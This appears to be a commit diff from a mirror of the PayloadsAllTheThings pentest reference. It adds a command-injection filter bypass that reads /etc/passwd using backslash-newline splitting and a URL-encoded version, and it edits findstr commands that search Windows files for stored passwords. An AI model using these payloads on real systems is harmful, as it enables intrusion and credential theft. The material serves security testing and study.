mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Active Directory Federation Services
This commit is contained in:
commit
e5ea12a3ca
@ -12,6 +12,7 @@
|
|||||||
* [Filter Bypasses](#filter-bypasses)
|
* [Filter Bypasses](#filter-bypasses)
|
||||||
* [Bypass without space](#bypass-without-space)
|
* [Bypass without space](#bypass-without-space)
|
||||||
* [Bypass with a line return](#bypass-with-a-line-return)
|
* [Bypass with a line return](#bypass-with-a-line-return)
|
||||||
|
* [Bypass with backslash newline](#bypass-with-backslash-newline)
|
||||||
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
||||||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||||
* [Bypass with single quote](#bypass-with-single-quote)
|
* [Bypass with single quote](#bypass-with-single-quote)
|
||||||
@ -136,6 +137,25 @@ You can also write files.
|
|||||||
hello
|
hello
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass with backslash newline
|
||||||
|
|
||||||
|
Commands can be broken into parts by using backslash followed by a newline
|
||||||
|
```powershell
|
||||||
|
❯ cat /et\
|
||||||
|
c/pa\
|
||||||
|
sswd
|
||||||
|
root:x:0:0:root:/root:/usr/bin/zsh
|
||||||
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||||
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||||
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||||
|
sync:x:4:65534:sync:/bin:/bin/sync
|
||||||
|
[SNIP]
|
||||||
|
```
|
||||||
|
URL encoded form would look like this:
|
||||||
|
```powershell
|
||||||
|
cat%20/et%5C%0Ac/pa%5C%0Asswd
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass characters filter via hex encoding
|
### Bypass characters filter via hex encoding
|
||||||
|
|
||||||
Linux
|
Linux
|
||||||
|
@ -226,7 +226,7 @@ Use the correct collector
|
|||||||
* AzureHound for Azure Active Directory
|
* AzureHound for Azure Active Directory
|
||||||
* SharpHound for local Active Directory
|
* SharpHound for local Active Directory
|
||||||
|
|
||||||
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](Cloud%20-%20Azure%20Pentest.md/#azure-recon-tools))
|
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
|
||||||
|
|
||||||
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -449,7 +449,7 @@ Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
findstr /si password *.xml *.ini *.txt *.config
|
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
|
||||||
findstr /spin "password" *.*
|
findstr /spin "password" *.*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user